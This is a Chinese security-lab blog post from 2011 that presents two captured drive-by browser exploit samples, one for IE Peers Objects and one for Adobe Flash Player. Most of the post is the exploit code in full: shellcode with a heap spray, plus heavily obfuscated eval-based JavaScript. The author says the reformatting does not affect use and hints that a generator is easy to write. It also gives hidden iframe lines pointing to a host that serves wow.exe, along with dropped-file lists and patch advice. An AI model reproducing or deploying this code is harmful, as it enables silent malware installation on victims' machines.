2011-9-13 18:20:08 捕获两个最新网马样本 IE + Flash 0day,2011-9-13 18:20:08 捕获两个最新网马样本,IE Peers Objects 漏洞 + Adobe Flash Player 漏洞。
这两个网马,我五、六月打的系统补丁都中,而且无报错、无卡死。
第一个网马,我测试用 IE 6.0 直接中,火狐 5.01 无视,升级系统补丁至最新解决。第二个网马是最新的 Adobe Flash Player 漏洞。
由于原始网马源码过于杂乱,以下公布的代码都经过格式化整理,看起来更顺眼,不影响使用。
同时提供原始网马,下载地址:http://115.com/file/e6vnqa7j。
解决方案:
1、打系统补丁至最新,网马 A 失效。
2、升级 Adobe Flash Player 至当前最新版“Adobe Flash Player 10.3.183.7 (2.98 MB)”,网马 B 失效。
写生成器:
1、极其简单,简单的异或算法,就不多说了。
------------------------------------- ↓ 网马 A ↓ -------------------------------------
|
网马样本\1\index.htm:
<HTML>
<BODY>
<BUTTON id=aaa style='DISPLAY: none' onclick=a1();>
</BUTTON>
<script src='ap.js'>
</script>
<SCRIPT language=javascript>
var a4 = unescape('%u5858%u5858%u10EB%u4B5B%uC' + '933%uB96' + '6%u03B8%u34' + '80%uBD0B%uFA' + 'E2%u05E' + 'B%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D' + '2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCE' + 'D5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDBE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uED' + 'BD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uB' + 'FBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB' + '8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4' + '136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2A' + 'D8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA66' + '9%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D' + '7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%ud5db%uC9C9%u87CD%u9292%u8CCA%uDF93%uD5D3%uCFD8%u93CA%uD2DE%u87D0%u8C85%uCA92%uCAD2%uD893%uD8C5%uBdBd%uBdBd%uEAEA%uEAEA%uEAEA%uEAEA');
function a1() {
ac2();
var a7 = document.createElement('body');
a7.addBehavior('\43\144\145\146\141\165\154\164\43\165\163\145\162\104\141\164\141');
document.appendChild(a7);
try {
a7.setAttribute('s', window);
a7.setAttribute('s', window);
a7.setAttribute('s', window);
a7.setAttribute('s', window);
a7.setAttribute('s', window);
a7.setAttribute('s', window);
a7.setAttribute('s', window);
a7.setAttribute('s', window);
a7.setAttribute('s', window);
a7.setAttribute('s', window);
} catch(e) {}
window.status += '';
}
document.getElementById('aaa').onclick();
document.write("\x3c\x74\x61\x62\x6c\x65\x20\x73\x74\x79\x6c\x65\x3d\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x61\x62\x73\x6f\x6c\x75\x74\x65\x3b\x63\x6c\x69\x70\x3a\x72\x65\x63\x74\x28\x30\x29\x3e");
</SCRIPT>
</BODY>
</HTML> |
|
网马样本\1\ap.js:
function ac2() {
a3 = new Array();
var a5 = 0x86000 - (a4.length * 2);
var LFlwBa = unescape('%u0c0c%u0c0c');
while (LFlwBa.length < a5 / 2) {
LFlwBa += LFlwBa;
};
var a6 = LFlwBa.substring(0, a5 / 2);
delete LFlwBa;
for (i = 0; i < 270; i++) {
a3[i] = a6 + a6 + a4;
}
} |
利用漏洞:
IE Peers Objects 漏洞
挂马地址:
<iframe src=http://w1.bnherw.com:81/index.htm width=0 height=0></iframe>
网马分析:
http://w1.bnherw.com:81/index.htm
http://w1.bnherw.com:81/ap.js
http://w1.bnherw.com:81/wow.exe
木马行为:
c:\n.scr 创建了
c:\DOCUME~1\netbar\LOCALS~1\Temp\1315909184.dat 创建了
c:\WINDOWS\system32\ksuser.dll 创建了
c:\WINDOWS\system32\dllcache\ksuser.dll 创建了
c:\WINDOWS\system32\TEM1E7.tmp 创建了
c:\WINDOWS\system32\midimap.dll 创建了
c:\WINDOWS\system32\dllcache\midimap.dll 创建了
360 日志:
时间 拦截内容
18:18:15 已清除 IE浏览器 试图执行恶意脚本 IE Peers Objects 漏洞
18:17:52 已拦截 IE浏览器 访问 http://w1.bnherw.com:81/index.htm [恶意网址]
------------------------------------- ↓ 网马 B ↓ -------------------------------------
|
网马样本\2\flash.html:
<html>
<body>
<script language="javascript">
var nbcode = '%u7468%u7074%u2f3a%u772f%u2e31%u6e62%u6568%u7772%u632e%u6d6f%u383a%u2f31%u6f77%u2e77%u7865%u0065';
v a r J = f u n c t i o n(n) {
r e t u r n S t r i n g.f r o m C h a r C o d e(n ^ 8)
};
e v a l(J(110) + J(125) + J(102) + J(107) + J(124) + J(97) + J(103) + J(102) + J(40) + J(102) + J(106) + J(32) + J(33) + J(115) + J(126) + J(105) + J(122) + J(40) + J(102) + J(109) + J(124) + J(106) + J(103) + J(103) + J(101) + J(40) + J(53) + J(40) + J(125) + J(102) + J(109) + J(123) + J(107) + J(105) + J(120) + J(109) + J(32) + J(47) + J(45) + J(125) + J(49) + J(56) + J(49) + J(56) + J(45) + J(125) + J(49) + J(56) + J(49) + J(56) + J(45) + J(125) + J(61) + J(60) + J(109) + J(106) + J(45) + J(125) + J(63) + J(61) + J(48) + J(106) + J(45) + J(125) + J(48) + J(106) + J(59) + J(107) + J(45) + J(125) + J(59) + J(61) + J(63) + J(60) + J(45) + J(125) + J(56) + J(59) + J(63) + J(48) + J(45) + J(125) + J(61) + J(62) + J(110) + J(61) + J(45) + J(125) + J(63) + J(62) + J(48) + J(106) + J(45) + J(125) + J(56) + J(59) + J(58) + J(56) + J(45) + J(125) + J(59) + J(59) + J(110) + J(61) + J(45) + J(125) + J(60) + J(49) + J(107) + J(49) + J(45) + J(125) + J(105) + J(108) + J(60) + J(57) + J(45) + J(125) + J(108) + J(106) + J(59) + J(59) + J(45) + J(125) + J(56) + J(110) + J(59) + J(62) + J(45) + J(125) + J(57) + J(60) + J(106) + J(109) + J(45) + J(125) + J(59) + J(48) + J(58) + J(48) + J(45) + J(125) + J(63) + J(60) + J(110) + J(58) + J(45) + J(125) + J(107) + J(57) + J(56) + J(48) + J(45) + J(125) + J(56) + J(108) + J(107) + J(106) + J(45) + J(125) + J(108) + J(105) + J(56) + J(59) + J(45) + J(125) + J(109) + J(106) + J(60) + J(56) + J(45) + J(125) + J(59) + J(106) + J(109) + J(110) + J(45) + J(125) + J(63) + J(61) + J(108) + J(110) + J(45) + J(125) + J(61) + J(109) + J(109) + J(63) + J(45) + J(125) + J(61) + J(109) + J(48) + J(106) + J(45) + J(125) + J(56) + J(59) + J(58) + J(60) + J(45) + J(125) + J(62) + J(62) + J(108) + J(108) + J(45) + J(125) + J(56) + J(107) + J(48) + J(106) + J(45) + J(125) + J(48) + J(106) + J(60) + J(106) + J(45) + J(125) + J(57) + J(107) + J(61) + J(109) + J(45) + J(125) + J(108) + J(108) + J(56) + J(59) + J(45) + J(125) + J(56) + J(60) + J(48) + J(106) + J(45) + J(125) + J(56) + J(59) + J(48) + J(106) + J(45) + J(125) + J(107) + J(59) + J(107) + J(61) + J(45) + J(125) + J(63) + J(58) + J(63) + J(61) + J(45) + J(125) + J(62) + J(108) + J(62) + J(107) + J(45) + J(125) + J(62) + J(109) + J(62) + J(110) + J(45) + J(125) + J(62) + J(60) + J(58) + J(109) + J(45) + J(125) + J(62) + J(107) + J(62) + J(107) + J(45) + J(125) + J(60) + J(59) + J(56) + J(56) + J(45) + J(125) + J(61) + J(107) + J(59) + J(105) + J(45) + J(125) + J(58) + J(109) + J(62) + J(109) + J(45) + J(125) + J(62) + J(59) + J(63) + J(59) + J(45) + J(125) + J(56) + J(56) + J(63) + J(58) + J(45) + J(125) + J(107) + J(56) + J(59) + J(59) + J(45) + J(125) + J(56) + J(59) + J(62) + J(60) + J(45) + J(125) + J(59) + J(56) + J(60) + J(56) + J(45) + J(125) + J(56) + J(107) + J(63) + J(48) + J(45) + J(125) + J(60) + J(56) + J(48) + J(106) + J(45) + J(125) + J(48) + J(106) + J(56) + J(107) + J(45) + J(125) + J(57) + J(107) + J(63) + J(56) + J(45) + J(125) + J(48) + J(106) + J(105) + J(108) + J(45) + J(125) + J(56) + J(48) + J(60) + J(56) + J(45) + J(125) + J(56) + J(49) + J(109) + J(106) + J(45) + J(125) + J(60) + J(56) + J(48) + J(106) + J(45) + J(125) + J(48) + J(108) + J(59) + J(60) + J(45) + J(125) + J(63) + J(107) + J(60) + J(56) + J(45) + J(125) + J(60) + J(56) + J(48) + J(106) + J(45) + J(125) + J(49) + J(61) + J(59) + J(107) + J(45) + J(125) + J(48) + J(109) + J(106) + J(110) + J(45) + J(125) + J(56) + J(109) + J(60) + J(109) + J(45) + J(125) + J(109) + J(48) + J(109) + J(107) + J(45) + J(125) + J(110) + J(110) + J(48) + J(60) + J(45) + J(125) + J(110) + J(110) + J(110) + J(110) + J(45) + J(125) + J(109) + J(107) + J(48) + J(59) + J(45) + J(125) + J(48) + J(59) + J(56) + J(60) + J(45) + J(125) + J(58) + J(60) + J(58) + J(107) + J(45) + J(125) + J(110) + J(110) + J(59) + J(107) + J(45) + J(125) + J(49) + J(61) + J(108) + J(56) + J(45) + J(125) + J(106) + J(110) + J(61) + J(56) + J(45) + J(125) + J(57) + J(105) + J(59) + J(62) + J(45) + J(125) + J(63) + J(56) + J(58) + J(110) + J(45) + J(125) + J(62) + J(110) + J(109) + J(48) + J(45) + J(125) + J(110) + J(110) + J(110) + J(110) + J(45) + J(125) + J(48) + J(106) + J(110) + J(110) + J(45) + J(125) + J(58) + J(60) + J(61) + J(60) + J(45) + J(125) + J(48) + J(108) + J(110) + J(107) + J(45) + J(125) + J(106) + J(105) + J(61) + J(58) + J(45) + J(125) + J(108) + J(106) + J(59) + J(59) + J(45) + J(125) + J(61) + J(59) + J(61) + J(59) + J(45) + J(125) + J(109) + J(106) + J(61) + J(58) + J(45) + J(125) + J(61) + J(59) + J(58) + J(60) + J(45) + J(125) + J(108) + J(56) + J(110) + J(110) + J(45) + J(125) + J(106) + J(110) + J(61) + J(108) + J(45) + J(125) + J(110) + J(109) + J(49) + J(48) + J(45) + J(125) + J(56) + J(109) + J(48) + J(105) + J(45) + J(125) + J(61) + J(59) + J(109) + J(48) + J(45) + J(125) + J(110) + J(110) + J(110) + J(110) + J(45) + J(125) + J(48) + J(59) + J(110) + J(110) + J(45) + J(125) + J(56) + J(60) + J(109) + J(107) + J(45) + J(125) + J(58) + J(107) + J(48) + J(59) + J(45) + J(125) + J(62) + J(58) + J(58) + J(60) + J(45) + J(125) + J(108) + J(56) + J(110) + J(110) + J(45) + J(125) + J(63) + J(109) + J(106) + J(110) + J(45) + J(125) + J(109) + J(58) + J(108) + J(48) + J(45) + J(125) + J(109) + J(48) + J(63) + J(59) + J(45) + J(125) + J(110) + J(110) + J(60) + J(56) + J(45) + J(125) + J(110) + J(110) + J(110) + J(110) + J(45) + J(125) + J(110) + J(110) + J(61) + J(58) + J(45) + J(125) + J(109) + J(48) + J(108) + J(56) + J(45) + J(125) + J(110) + J(110) + J(108) + J(63) + J(45) + J(125) + J(110) + J(110) + J(110) + J(110) + J(47) + J(35) + J(102) + J(106) + J(107) + J(103) + J(108) + J(109) + J(33) + J(51) + J(126) + J(105) + J(122) + J(40) + J(102) + J(106) + J(53) + J(102) + J(109) + J(127) + J(40) + J(73) + J(122) + J(122) + J(105) + J(113) + J(32) + J(33) + J(51) + J(126) + J(105) + J(122) + J(40) + J(102) + J(106) + J(120) + J(103) + J(127) + J(109) + J(122) + J(53) + J(56) + J(112) + J(48) + J(62) + J(56) + J(56) + J(56) + J(37) + J(32) + J(102) + J(109) + J(124) + J(106) + J(103) + J(103) + J(101) + J(38) + J(100) + J(109) + J(102) + J(111) + J(124) + J(96) + J(34) + J(58) + J(33) + J(51) + J(126) + J(105) + J(122) + J(40) + J(102) + J(106) + J(100) + J(103) + J(100) + J(53) + J(125) + J(102) + J(109) + J(123) + J(107) + J(105) + J(120) + J(109) + J(32) + J(47) + J(45) + J(125) + J(56) + J(107) + J(56) + J(107) + J(45) + J(125) + J(56) + J(107) + J(56) + J(107) + J(47) + J(33) + J(51) + J(127) + J(96) + J(97) + J(100) + J(109) + J(32) + J(102) + J(106) + J(100) + J(103) + J(100) + J(38) + J(100) + J(109) + J(102) + J(111) + J(124) + J(96) + J(52) + J(102) + J(106) + J(120) + J(103) + J(127) + J(109) + J(122) + J(39) + J(58) + J(33) + J(115) + J(102) + J(106) + J(100) + J(103) + J(100) + J(35) + J(53) + J(102) + J(106) + J(100) + J(103) + J(100) + J(51) + J(117) + J(51) + J(126) + J(105) + J(122) + J(40) + J(102) + J(106) + J(127) + J(101) + J(53) + J(102) + J(106) + J(100) + J(103) + J(100) + J(38) + J(123) + J(125) + J(106) + J(123) + J(124) + J(122) + J(97) + J(102) + J(111) + J(32) + J(56) + J(36) + J(102) + J(106) + J(120) + J(103) + J(127) + J(109) + J(122) + J(39) + J(58) + J(33) + J(51) + J(108) + J(109) + J(100) + J(109) + J(124) + J(109) + J(40) + J(102) + J(106) + J(100) + J(103) + J(100) + J(51) + J(110) + J(103) + J(122) + J(32) + J(97) + J(53) + J(56) + J(51) + J(97) + J(52) + J(58) + J(63) + J(56) + J(51) + J(97) + J(35) + J(35) + J(33) + J(115) + J(102) + J(106) + J(83) + J(97) + J(85) + J(53) + J(102) + J(106) + J(127) + J(101) + J(35) + J(102) + J(106) + J(127) + J(101) + J(35) + J(102) + J(109) + J(124) + J(106) + J(103) + J(103) + J(101) + J(51) + J(117) + J(117) + J(102) + J(106) + J(32) + J(33) + J(51) + J(108) + J(103) + J(107) + J(125) + J(101) + J(109) + J(102) + J(124) + J(38) + J(127) + J(122) + J(97) + J(124) + J(109) + J(32) + J(42) + J(52) + J(103) + J(106) + J(98) + J(109) + J(107) + J(124) + J(40) + J(107) + J(100) + J(105) + J(123) + J(123) + J(97) + J(108) + J(53) + J(84) + J(42) + J(107) + J(100) + J(123) + J(97) + J(108) + J(50) + J(76) + J(58) + J(63) + J(75) + J(76) + J(74) + J(62) + J(77) + J(37) + J(73) + J(77) + J(62) + J(76) + J(37) + J(57) + J(57) + J(107) + J(110) + J(37) + J(49) + J(62) + J(74) + J(48) + J(37) + J(60) + J(60) + J(60) + J(61) + J(61) + J(59) + J(61) + J(60) + J(56) + J(56) + J(56) + J(56) + J(84) + J(42) + J(40) + J(97) + J(108) + J(53) + J(84) + J(42) + J(102) + J(109) + J(124) + J(106) + J(103) + J(103) + J(101) + J(84) + J(42) + J(40) + J(127) + J(97) + J(108) + J(124) + J(96) + J(53) + J(84) + J(42) + J(56) + J(84) + J(42) + J(40) + J(96) + J(109) + J(97) + J(111) + J(96) + J(124) + J(53) + J(84) + J(42) + J(56) + J(84) + J(42) + J(40) + J(107) + J(103) + J(108) + J(109) + J(106) + J(105) + J(123) + J(109) + J(53) + J(84) + J(42) + J(96) + J(124) + J(124) + J(120) + J(50) + J(84) + J(39) + J(84) + J(39) + J(108) + J(103) + J(127) + J(102) + J(100) + J(103) + J(105) + J(108) + J(38) + J(101) + J(105) + J(107) + J(122) + J(103) + J(101) + J(109) + J(108) + J(97) + J(105) + J(38) + J(107) + J(103) + J(101) + J(84) + J(39) + J(120) + J(125) + J(106) + J(84) + J(39) + J(123) + J(96) + J(103) + J(107) + J(99) + J(127) + J(105) + J(126) + J(109) + J(84) + J(39) + J(107) + J(105) + J(106) + J(123) + J(84) + J(39) + J(110) + J(100) + J(105) + J(123) + J(96) + J(84) + J(39) + J(123) + J(127) + J(110) + J(100) + J(105) + J(123) + J(96) + J(38) + J(107) + J(105) + J(106) + J(84) + J(42) + J(54) + J(52) + J(120) + J(105) + J(122) + J(105) + J(101) + J(40) + J(102) + J(105) + J(101) + J(109) + J(53) + J(84) + J(42) + J(101) + J(103) + J(126) + J(97) + J(109) + J(84) + J(42) + J(40) + J(126) + J(105) + J(100) + J(125) + J(109) + J(53) + J(84) + J(42) + J(102) + J(106) + J(38) + J(123) + J(127) + J(110) + J(84) + J(42) + J(40) + J(84) + J(39) + J(54) + J(52) + J(84) + J(39) + J(103) + J(106) + J(98) + J(109) + J(107) + J(124) + J(54) + J(42) + J(33) + J(51) + '');
</script>
</body>
</html> |
利用漏洞:
最新的 Adobe Flash Player 漏洞,漏洞名字不太清楚,没具体去查。
挂马地址:
<iframe src=http://w1.bnherw.com:81/flash.html width=0 height=0></iframe>
网马分析:
http://w1.bnherw.com:81/flash.html
http://w1.bnherw.com:81/wow.exe
木马行为:
c:\Documents and Settings\netbar\Application Data\f.exe 创建了
c:\DOCUME~1\netbar\LOCALS~1\Temp\1315909199.dat 创建了
c:\WINDOWS\system32\ksuser.dll 创建了
c:\WINDOWS\system32\dllcache\ksuser.dll 创建了
c:\WINDOWS\system32\TEM1E8.tmp 创建了
c:\WINDOWS\system32\midimap.dll 创建了
c:\WINDOWS\system32\dllcache\midimap.dll 创建了
文章作者
Nuclear'Atk
上次更新
2011-09-15
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。